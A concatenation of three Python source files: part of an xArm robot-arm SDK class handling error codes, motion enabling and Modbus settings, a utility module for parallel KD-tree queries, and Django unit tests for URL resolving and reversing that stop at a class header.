pretty_print('************* {}, {}: {} **************'.format(
'获取控制器错误警告码' if lang == 'cn' else 'GetErrorWarnCode',
'状态' if lang == 'cn' else 'Status',
ret[0]), color='light_blue')
controller_error = ControllerError(self._error_code, status=0)
controller_warn = ControllerWarn(self._warn_code, status=0)
pretty_print('* {}: {}, {}: {}'.format(
'错误码' if lang == 'cn' else 'ErrorCode',
controller_error.code,
'信息' if lang == 'cn' else 'Info',
controller_error.title[lang]),
color='red' if self._error_code != 0 else 'white')
pretty_print('* {}: {}, {}: {}'.format(
'警告码' if lang == 'cn' else 'WarnCode',
controller_warn.code,
'信息' if lang == 'cn' else 'Info',
controller_warn.title[lang]),
color='yellow' if self._warn_code != 0 else 'white')
pretty_print('*' * 50, color='light_blue')
return ret[0], ret[1:3] if ret[0] == 0 else [self._error_code, self._warn_code]
@xarm_is_connected(_type='set')
def clean_error(self):
ret = self.arm_cmd.clean_err()
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[clean_error], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[clean_error], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> clean_error -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def clean_warn(self):
ret = self.arm_cmd.clean_war()
self.log_api_info('API -> clean_warn -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
@xarm_is_not_simulation_mode(ret=0)
def motion_enable(self, enable=True, servo_id=None):
assert servo_id is None or (isinstance(servo_id, int) and 1 <= servo_id <= 8)
if servo_id is None or servo_id == 8:
ret = self.arm_cmd.motion_en(8, int(enable))
else:
ret = self.arm_cmd.motion_en(servo_id, int(enable))
ret[0] = self._check_code(ret[0])
if ret[0] == 0:
self._is_ready = bool(enable)
self.get_state()
if self._state in [4, 5]:
self._sleep_finish_time = 0
if self._is_ready:
pretty_print('[motion_enable], xArm is not ready to move', color='red')
self._is_ready = False
else:
if not self._is_ready:
pretty_print('[motion_enable], xArm is ready to move', color='green')
self._is_ready = True
self.log_api_info('API -> motion_enable -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
def wait_move(self, timeout=None):
if timeout is not None:
expired = time.time() + timeout + (self._sleep_finish_time if self._sleep_finish_time > time.time() else 0)
else:
expired = 0
count = 0
_, state = self.get_state()
max_cnt = 2 if _ == 0 and state == 1 else 10
while timeout is None or time.time() < expired:
if not self.connected:
self.log_api_info('wait_move, xarm is disconnected', code=APIState.NOT_CONNECTED)
return APIState.NOT_CONNECTED
if time.time() - self._last_report_time > 0.4:
self.get_state()
self.get_err_warn_code()
if self.error_code != 0:
self.log_api_info('wait_move, xarm has error, error={}'.format(self.error_code), code=APIState.HAS_ERROR)
return APIState.HAS_ERROR
if self.is_stop:
_, state = self.get_state()
if _ != 0 or state not in [4, 5]:
time.sleep(0.02)
continue
self._sleep_finish_time = 0
self.log_api_info('wait_move, xarm is stopped, state={}'.format(self.state), code=APIState.EMERGENCY_STOP)
return APIState.EMERGENCY_STOP
if time.time() < self._sleep_finish_time or self.state == 3:
time.sleep(0.02)
count = 0
continue
if self.state != 1:
count += 1
if count >= max_cnt:
_, state = self.get_state()
self.get_err_warn_code()
if _ == 0 and state != 1:
return 0
else:
count = 0
# return 0
# if count % 4 == 0:
# self.get_state()
# self.get_err_warn_code()
else:
count = 0
time.sleep(0.05)
return APIState.WAIT_FINISH_TIMEOUT
@xarm_is_connected(_type='set')
def _check_modbus_code(self, ret, length=2, only_check_code=False):
code = ret[0]
if self._check_code(code) == 0:
if not only_check_code:
if len(ret) < length:
return APIState.MODBUS_ERR_LENG
if ret[1] != XCONF.TGPIO_ID:
return APIState.TGPIO_ID_ERR
if code != 0:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
code = 0
return code
@xarm_is_connected(_type='set')
def checkset_modbus_baud(self, baudrate, check=True):
if check and self.modbus_baud == baudrate:
return 0
if baudrate not in self.arm_cmd.BAUDRATES:
return APIState.MODBUS_BAUD_NOT_SUPPORT
ret, cur_baud_inx = self._get_modbus_baudrate_inx()
if ret == 0:
baud_inx = self.arm_cmd.BAUDRATES.index(baudrate)
if cur_baud_inx != baud_inx:
try:
self._ignore_error = True
self._ignore_state = True if self.state not in [4, 5] else False
state = self.state
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.MODBUS_BAUDRATE, baud_inx)
self.arm_cmd.tgpio_addr_w16(0x1A0B, baud_inx)
self.arm_cmd.tgpio_addr_w16(XCONF.ServoConf.SOFT_REBOOT, 1)
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code == 19 or self.error_code == 28:
self.clean_error()
if self._ignore_state:
self.set_state(state if state >= 3 else 0)
time.sleep(1)
except Exception as e:
self._ignore_error = False
self._ignore_state = False
logger.error('checkset_modbus_baud error: {}'.format(e))
return APIState.API_EXCEPTION
self._ignore_error = False
self._ignore_state = False
ret, cur_baud_inx = self._get_modbus_baudrate_inx()
self.log_api_info('API -> checkset_modbus_baud -> code={}, baud_inx={}'.format(ret, cur_baud_inx), code=ret)
if ret == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
self.modbus_baud = self.arm_cmd.BAUDRATES[cur_baud_inx]
return 0 if self.modbus_baud == baudrate else APIState.MODBUS_BAUD_NOT_CORRECT
@xarm_is_connected(_type='get')
def _get_modbus_baudrate_inx(self):
ret = self.arm_cmd.tgpio_addr_r16(XCONF.ServoConf.MODBUS_BAUDRATE & 0x0FFF)
if ret[0] in [XCONF.UxbusState.ERR_CODE, XCONF.UxbusState.WAR_CODE]:
if self.error_code != 19 and self.error_code != 28:
self.get_err_warn_code()
if self.error_code != 19 and self.error_code != 28:
ret[0] = 0
return ret[0], ret[1]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_timeout(self, timeout):
ret = self.arm_cmd.set_modbus_timeout(timeout)
self.log_api_info('API -> set_tgpio_modbus_timeout -> code={}'.format(ret[0]), code=ret[0])
return ret[0]
@xarm_is_connected(_type='set')
def set_tgpio_modbus_baudrate(self, baud):
code = self.checkset_modbus_baud(baud, check=False)
self.log_api_info('API -> set_tgpio_modbus_baudrate -> code={}'.format(code), code=code)
return code
@xarm_is_connected(_type='get')
def get_tgpio_modbus_baudrate(self):
code, baud_inx = self._get_modbus_baudrate_inx()
if code == 0 and baud_inx < len(self.arm_cmd.BAUDRATES):
self.modbus_baud = self.arm_cmd.BAUDRATES[baud_inx]
return code, self.modbus_baud
def getset_tgpio_modbus_data(self, datas, min_res_len=0, ignore_log=False):
if not self.connected:
return APIState.NOT_CONNECTED, []
ret = self.arm_cmd.tgpio_set_modbus(datas, len(datas))
ret[0] = self._check_modbus_code(ret, min_res_len + 2)
if not ignore_log:
self.log_api_info('API -> getset_tgpio_modbus_data -> code={}, response={}'.format(ret[0], ret[2:]), code=ret[0])
return ret[0], ret[2:]
@xarm_is_connected(_type='set')
def set_simulation_robot(self, on_off):
ret = self.arm_cmd.set_simulation_robot(on_off)
ret[0] = self._check_code(ret[0])
self.log_api_info('API -> set_simulation_robot({}) -> code={}'.format(on_off, ret[0]), code=ret[0])
return ret[0]
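# Illustrative usage only (not part of this module): the base class above is
# normally driven through the SDK's public wrapper. The import path and class
# name below are an assumption based on the xArm Python SDK layout, so treat
# this strictly as a sketch, not as this file's API.
#
#     from xarm.wrapper import XArmAPI
#     arm = XArmAPI('192.168.1.194')   # typically connects control/report sockets on construction
#     arm.motion_enable(True)
#     arm.set_mode(0)
#     arm.set_state(0)
#     code, pos = arm.get_position(is_radian=False)
#     arm.disconnect()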
|
utils.py
|
from joblib import Parallel, delayed
from scipy import spatial
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import multiprocessing as mp
import copy
import time
tree = None
pred_vectors = None
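# ordered_distance() below reads these module-level globals instead of taking
# the tree as an argument: when the worker processes are forked they inherit
# the module state, so only the integer index i has to be shipped per task
# rather than pickling the whole KD-tree for every call.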
def ordered_distance(i):
return tree.query(pred_vectors[i],k=1000)[1]
def load(a_tree, a_pred_vectors):
global tree, pred_vectors
tree = a_tree
pred_vectors = a_pred_vectors
def paral_query(my_tree, my_pred_vectors):
    # Publish the tree and the query vectors through the module-level globals.
    # Assigning to local names here would leave the globals used by
    # ordered_distance() untouched, so the workers would see stale (or unset) data.
    load(my_tree, my_pred_vectors)
    n = len(my_pred_vectors)
    res = Parallel(n_jobs=-1, verbose=4, backend="multiprocessing", batch_size=2)(
        map(delayed(ordered_distance), range(n)))
    return np.array(res)
def print_histo(rank, titulo='graph',bins = 1000):
plt.title(titulo)
plt.hist(rank,bins)
plt.show()
def get_table(data, indexs, columns_labels):
return pd.DataFrame(data=data, index=indexs, columns=columns_labels)
def worker(kdtree, query_list, ini, end, queue, job_number):
arr = [kdtree.query(vec, k=1000)[1] for vec in query_list[ini:end]]
queue.put((job_number, arr))
def parallel_query(kdtree, vectors, n_jobs=-1):
if n_jobs == -1:
n_jobs = mp.cpu_count()
ini_time = time.time()
print("-> launching %d jobs: " % n_jobs, end="")
m = mp.Manager()
r_queue = m.Queue()
N = len(vectors)
segments_size = len(vectors) // n_jobs
jobs = []
ini = 0
for i in range(n_jobs-1):
end = ini + segments_size + 1
jobs.append(mp.Process(target=worker, args=(kdtree, vectors, ini, end, r_queue, i)))
print(".", end="")
jobs[-1].start()
ini = end
jobs.append(mp.Process(target=worker, args=(kdtree, vectors, ini, N, r_queue, n_jobs-1)))
print(". DONE!", end="")
jobs[-1].start()
print(" || waiting %d jobs: " % n_jobs, end="")
for p in jobs:
p.join()
print(".", end="")
print(" DONE!", end="")
print(" || grouping data ---", end="")
result = {}
while not r_queue.empty():
par = r_queue.get()
result[par[0]] = par[1]
dists = []
for i in range(n_jobs):
dists.extend(result[i])
dists = np.array(dists)
end_time = time.time()
print(" DONE! [elapse time: {}]".format(round(end_time-ini_time, 3)))
return dists
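# Minimal self-check for parallel_query (illustrative only; the sizes are
# arbitrary, chosen so that the hard-coded k=1000 in worker() stays within the
# reference set). Guarded by __main__ so nothing runs on import.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    ref_vectors = rng.standard_normal((2000, 16))   # reference set indexed by the KD-tree
    query_vectors = rng.standard_normal((50, 16))   # vectors whose neighbour ranking we want
    kdtree = spatial.cKDTree(ref_vectors)
    ranks = parallel_query(kdtree, query_vectors, n_jobs=4)
    print(ranks.shape)                              # expected: (50, 1000)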
|
tests.py
|
"""
Unit tests for reverse URL lookups.
"""
import pickle
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect
from django.shortcuts import redirect
from django.test import RequestFactory, SimpleTestCase, TestCase, override_settings
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch,
Resolver404,
ResolverMatch,
URLPattern,
URLResolver,
get_callable,
get_resolver,
get_urlconf,
include,
path,
re_path,
resolve,
reverse,
reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format:
# (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
(
"/normal/42/37/",
"normal-view",
"",
"",
"normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/view_class/42/37/",
"view-class",
"",
"",
"view-class",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/normal/42/37/",
"inc-normal-view",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/view_class/42/37/",
"inc-view-class",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-view-class",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
(
"/mixed_args/42/37/",
"mixed-args",
"",
"",
"mixed-args",
views.empty_view,
(),
{"extra": True, "arg2": "37"},
),
(
"/included/mixed_args/42/37/",
"inc-mixed-args",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-mixed-args",
views.empty_view,
(),
{"arg2": "37"},
),
(
"/included/12/mixed_args/42/37/",
"inc-mixed-args",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-mixed-args",
views.empty_view,
(),
{"arg2": "37"},
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
"/unnamed/normal/42/37/",
None,
"",
"",
"urlpatterns_reverse.views.empty_view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/unnamed/view_class/42/37/",
None,
"",
"",
"urlpatterns_reverse.views.ViewClass",
views.view_class_instance,
(),
{"arg1": "42", "arg2": "37"},
),
# If you have no kwargs, you get an args list.
(
"/no_kwargs/42/37/",
"no-kwargs",
"",
"",
"no-kwargs",
views.empty_view,
("42", "37"),
{},
),
(
"/included/no_kwargs/42/37/",
"inc-no-kwargs",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-no-kwargs",
views.empty_view,
("42", "37"),
{},
),
(
"/included/12/no_kwargs/42/37/",
"inc-no-kwargs",
"included_namespace_urls",
"included_namespace_urls",
"included_namespace_urls:inc-no-kwargs",
views.empty_view,
("12", "42", "37"),
{},
),
# Namespaces
(
"/test1/inner/42/37/",
"urlobject-view",
"testapp",
"test-ns1",
"test-ns1:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"included_namespace_urls:test-ns3",
"included_namespace_urls:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/ns-included1/normal/42/37/",
"inc-normal-view",
"included_namespace_urls",
"inc-ns1",
"inc-ns1:inc-normal-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"included_namespace_urls:test-ns3",
"included_namespace_urls:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/default/inner/42/37/",
"urlobject-view",
"testapp",
"testapp",
"testapp:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/other2/inner/42/37/",
"urlobject-view",
"nodefault",
"other-ns2",
"other-ns2:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/other1/inner/42/37/",
"urlobject-view",
"nodefault",
"other-ns1",
"other-ns1:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
# Nested namespaces
(
"/ns-included1/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"inc-ns1:test-ns3",
"inc-ns1:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/ns-included1/ns-included4/ns-included2/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:namespace_urls:included_namespace_urls:testapp",
"inc-ns1:inc-ns4:inc-ns2:test-ns3",
"inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/app-included/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:testapp",
"inc-app:test-ns3",
"inc-app:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
(
"/app-included/ns-included4/ns-included2/test3/inner/42/37/",
"urlobject-view",
"included_namespace_urls:namespace_urls:included_namespace_urls:testapp",
"inc-app:inc-ns4:inc-ns2:test-ns3",
"inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view",
views.empty_view,
(),
{"arg1": "42", "arg2": "37"},
),
# Namespaces capturing variables
(
"/inc70/",
"inner-nothing",
"included_urls",
"inc-ns5",
"inc-ns5:inner-nothing",
views.empty_view,
(),
{"outer": "70"},
),
(
"/inc78/extra/foobar/",
"inner-extra",
"included_urls",
"inc-ns5",
"inc-ns5:inner-extra",
views.empty_view,
(),
{"outer": "78", "extra": "foobar"},
),
)
test_data = (
("places", "/places/3/", [3], {}),
("places", "/places/3/", ["3"], {}),
("places", NoReverseMatch, ["a"], {}),
("places", NoReverseMatch, [], {}),
("places?", "/place/", [], {}),
("places+", "/places/", [], {}),
("places*", "/place/", [], {}),
("places2?", "/", [], {}),
("places2+", "/places/", [], {}),
("places2*", "/", [], {}),
("places3", "/places/4/", [4], {}),
("places3", "/places/harlem/", ["harlem"], {}),
("places3", NoReverseMatch, ["harlem64"], {}),
("places4", "/places/3/", [], {"id": 3}),
("people", NoReverseMatch, [], {}),
("people", "/people/adrian/", ["adrian"], {}),
("people", "/people/adrian/", [], {"name": "adrian"}),
("people", NoReverseMatch, ["name with spaces"], {}),
("people", NoReverseMatch, [], {"name": "name with spaces"}),
("people2", "/people/name/", [], {}),
("people2a", "/people/name/fred/", ["fred"], {}),
("people_backref", "/people/nate-nate/", ["nate"], {}),
("people_backref", "/people/nate-nate/", [], {"name": "nate"}),
("optional", "/optional/fred/", [], {"name": "fred"}),
("optional", "/optional/fred/", ["fred"], {}),
("named_optional", "/optional/1/", [1], {}),
("named_optional", "/optional/1/", [], {"arg1": 1}),
("named_optional", "/optional/1/2/", [1, 2], {}),
("named_optional", "/optional/1/2/", [], {"arg1": 1, "arg2": 2}),
("named_optional_terminated", "/optional/1/", [1], {}),
("named_optional_terminated", "/optional/1/", [], {"arg1": 1}),
("named_optional_terminated", "/optional/1/2/", [1, 2], {}),
("named_optional_terminated", "/optional/1/2/", [], {"arg1": 1, "arg2": 2}),
("hardcoded", "/hardcoded/", [], {}),
("hardcoded2", "/hardcoded/doc.pdf", [], {}),
("people3", "/people/il/adrian/", [], {"state": "il", "name": "adrian"}),
("people3", NoReverseMatch, [], {"state": "il"}),
("people3", NoReverseMatch, [], {"name": "adrian"}),
("people4", NoReverseMatch, [], {"state": "il", "name": "adrian"}),
("people6", "/people/il/test/adrian/", ["il/test", "adrian"], {}),
("people6", "/people//adrian/", ["adrian"], {}),
("range", "/character_set/a/", [], {}),
("range2", "/character_set/x/", [], {}),
("price", "/price/$10/", ["10"], {}),
("price2", "/price/$10/", ["10"], {}),
("price3", "/price/$10/", ["10"], {}),
(
"product",
"/product/chocolate+($2.00)/",
[],
{"price": "2.00", "product": "chocolate"},
),
("headlines", "/headlines/2007.5.21/", [], {"year": 2007, "month": 5, "day": 21}),
(
"windows",
r"/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/",
[],
{"drive_name": "C", "path": r"Documents and Settings\spam"},
),
("special", r"/special_chars/~@+%5C$*%7C/", [r"~@+\$*|"], {}),
("special", r"/special_chars/some%20resource/", [r"some resource"], {}),
("special", r"/special_chars/10%25%20complete/", [r"10% complete"], {}),
("special", r"/special_chars/some%20resource/", [], {"chars": r"some resource"}),
("special", r"/special_chars/10%25%20complete/", [], {"chars": r"10% complete"}),
("special", NoReverseMatch, [""], {}),
("mixed", "/john/0/", [], {"name": "john"}),
("repeats", "/repeats/a/", [], {}),
("repeats2", "/repeats/aa/", [], {}),
("repeats3", "/repeats/aa/", [], {}),
("test", "/test/1", [], {}),
("inner-nothing", "/outer/42/", [], {"outer": "42"}),
("inner-nothing", "/outer/42/", ["42"], {}),
("inner-nothing", NoReverseMatch, ["foo"], {}),
("inner-extra", "/outer/42/extra/inner/", [], {"extra": "inner", "outer": "42"}),
("inner-extra", "/outer/42/extra/inner/", ["42", "inner"], {}),
("inner-extra", NoReverseMatch, ["fred", "inner"], {}),
("inner-no-kwargs", "/outer-no-kwargs/42/inner-no-kwargs/1/", ["42", "1"], {}),
("disjunction", NoReverseMatch, ["foo"], {}),
("inner-disjunction", NoReverseMatch, ["10", "11"], {}),
("extra-places", "/e-places/10/", ["10"], {}),
("extra-people", "/e-people/fred/", ["fred"], {}),
("extra-people", "/e-people/fred/", [], {"name": "fred"}),
("part", "/part/one/", [], {"value": "one"}),
("part", "/prefix/xx/part/one/", [], {"value": "one", "prefix": "xx"}),
("part2", "/part2/one/", [], {"value": "one"}),
("part2", "/part2/", [], {}),
("part2", "/prefix/xx/part2/one/", [], {"value": "one", "prefix": "xx"}),
("part2", "/prefix/xx/part2/", [], {"prefix": "xx"}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
("nested-noncapture", "/nested/noncapture/opt", [], {"p": "opt"}),
("nested-capture", "/nested/capture/opt/", ["opt/"], {}),
("nested-capture", NoReverseMatch, [], {"p": "opt"}),
("nested-mixedcapture", "/nested/capture/mixed/opt", ["opt"], {}),
("nested-mixedcapture", NoReverseMatch, [], {"p": "opt"}),
("nested-namedcapture", "/nested/capture/named/opt/", [], {"outer": "opt/"}),
("nested-namedcapture", NoReverseMatch, [], {"outer": "opt/", "inner": "opt"}),
("nested-namedcapture", NoReverseMatch, [], {"inner": "opt"}),
("non_path_include", "/includes/non_path_include/", [], {}),
# Tests for #13154
("defaults", "/defaults_view1/3/", [], {"arg1": 3, "arg2": 1}),
("defaults", "/defaults_view2/3/", [], {"arg1": 3, "arg2": 2}),
("defaults", NoReverseMatch, [], {"arg1": 3, "arg2": 3}),
("defaults", NoReverseMatch, [], {"arg2": 1}),
# Security tests
("security", "/%2Fexample.com/security/", ["/example.com"], {}),
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.no_urls")
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r"^$"), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see the 'urlpatterns' "
"variable with valid patterns in the file then the issue is "
"probably caused by a circular import.",
):
getattr(resolver, "url_patterns")
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse("name", args=["a"], kwargs={"b": "c"})
@override_script_prefix("/{{invalid}}/")
def test_prefix_braces(self):
self.assertEqual(
"/%7B%7Binvalid%7D%7D/includes/non_path_include/",
reverse("non_path_include"),
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix("/bogus)/"):
self.assertEqual(
"/bogus)/includes/non_path_include/", reverse("non_path_include")
)
with override_script_prefix("/(bogus)/"):
self.assertEqual(
"/(bogus)/includes/non_path_include/", reverse("non_path_include")
)
@override_script_prefix("/bump%20map/")
def test_prefix_format_char(self):
self.assertEqual(
"/bump%2520map/includes/non_path_include/", reverse("non_path_include")
)
@override_script_prefix("/%7Eme/")
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual("/%257Eme/places/1/", reverse("places", args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(
NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"
):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix("/script:name/")
def test_script_name_escaping(self):
self.assertEqual(
reverse("optional", args=["foo:bar"]), "/script:name/optional/foo:bar/"
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("nonexistent-view")
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places")
def test_illegal_args_message(self):
msg = (
"Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) "
"tried:"
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places", args=(1, 2))
def test_illegal_kwargs_message(self):
msg = (
"Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 "
"pattern(s) tried:"
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse("places", kwargs={"arg1": 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver("urlpatterns_reverse.namespace_urls")
sub_resolver = resolver.namespace_dict["test-ns1"][1]
self.assertIn("<URLPattern list>", repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = "urlpatterns_reverse.named_urls"
proxy_url = reverse_lazy("named-url1", urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver("urlpatterns_reverse.named_urls")
test_urls = [
# (name, args, kwargs, expected)
("named-url1", (), {}, ""),
("named-url2", ("arg",), {}, "extra/arg/"),
("named-url2", (), {"extra": "arg"}, "extra/arg/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver("urlpatterns_reverse.named_urls_conflict")
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
("name-conflict", (), {}, "conflict/"),
# With an arg, the last URL in urlpatterns has precedence.
("name-conflict", ("arg",), {}, "conflict-last/arg/"),
# With a kwarg, other URL patterns can be reversed.
("name-conflict", (), {"first": "arg"}, "conflict-first/arg/"),
("name-conflict", (), {"middle": "arg"}, "conflict-middle/arg/"),
("name-conflict", (), {"last": "arg"}, "conflict-last/arg/"),
# The number and order of the arguments don't interfere with reversing.
("name-conflict", ("arg", "arg"), {}, "conflict/arg/arg/"),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ["", "a", "\\", "."]
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = "urlpatterns_reverse.named_urls"
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{"type": URLPattern, "name": "named-url1"}],
[{"type": URLPattern, "name": "named-url2"}],
[{"type": URLPattern, "name": None}],
[{"type": URLResolver}, {"type": URLPattern, "name": "named-url3"}],
[{"type": URLResolver}, {"type": URLPattern, "name": "named-url4"}],
[{"type": URLResolver}, {"type": URLPattern, "name": None}],
[{"type": URLResolver}, {"type": URLResolver}],
]
with self.assertRaisesMessage(Resolver404, "tried") as cm:
resolve("/included/nonexistent-url", urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn("tried", e.args[0])
self.assertEqual(
len(e.args[0]["tried"]),
len(url_types_names),
"Wrong number of tried URLs returned. Expected %s, got %s."
% (len(url_types_names), len(e.args[0]["tried"])),
)
for tried, expected in zip(e.args[0]["tried"], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
                    self.assertIsInstance(
                        t, e["type"], "%s is not an instance of %s" % (t, e["type"])
                    )
if "name" in e:
if not e["name"]:
self.assertIsNone(
t.name, "Expected no URL name but found %s." % t.name
)
else:
self.assertEqual(
t.name,
e["name"],
'Wrong URL name. Expected "%s", got "%s".'
% (e["name"], t.name),
)
def test_namespaced_view_detail(self):
resolver = get_resolver("urlpatterns_reverse.nested_urls")
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.view1"))
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.view2"))
self.assertTrue(resolver._is_callback("urlpatterns_reverse.nested_urls.View3"))
self.assertFalse(resolver._is_callback("urlpatterns_reverse.nested_urls.blub"))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver("urlpatterns_reverse.method_view_urls")
self.assertTrue(
resolver._is_callback(
"urlpatterns_reverse.method_view_urls.ViewContainer.method_view"
)
)
self.assertTrue(
resolver._is_callback(
"urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view"
)
)
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r"^/"), "urlpatterns_reverse.urls")
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF="urlpatterns_reverse.reverse_lazy_urls")
class ReverseLazyTest(TestCase):
